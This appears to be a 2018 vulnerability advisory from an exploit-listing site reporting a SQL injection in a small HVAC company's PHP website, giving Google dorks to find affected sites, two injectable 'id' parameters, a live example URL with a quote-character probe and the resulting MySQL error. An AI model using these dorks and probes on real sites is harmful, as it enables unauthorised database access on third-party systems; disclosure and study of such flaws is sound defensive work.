Total Comfort Solutions A Commercial Heating and Air Conditioning Company SQL Injection Vulnerability

2018.05.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Total Comfort Solutions A Commercial Heating and Air Conditioning Company SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 29/05/2018 # Vendor Homepages : totalcomfortsolutions.com # Tested On : Windows # Exploit Risk : Medium # CWE: CWE-89 ################################################################################################# # Description About the Product : Total Comfort Solutions offers the skilled development and delivery of innovative Heating, Ventilation, and Air Conditioning (HVAC) solutions to clients across South Carolina and eastern Georgia. Total Comfort Solutions, a commercial heating and air conditioning (HVAC) company, services, repairs, and performs preventative maintenance focusing on Healthcare, Industrial, Office buildings and Data centers in Charleston, Columbia, Florence, Myrtle Beach, SC and Augusta, GA. # Google Dork 1 : inurl:''/totalcomfort/aboutus.php?id='' # Google Dork 2 : inurl:''/totalcomfort/resources.php?id='' # Google Dork 3 : intext:''Total Comfort Solutions''' # Exploit : /totalcomfort/aboutus.php?id=[SQL Injection] # Exploit : /totalcomfort/resources.php?id=[SQL Injection] # Example Site => dealerbranded.com/totalcomfort/aboutus.php?id=101%27 [ Proof of Concept for SQL Injection ] => archive.is/OZwf1 # Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''444'' or navigation.pagename = ''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top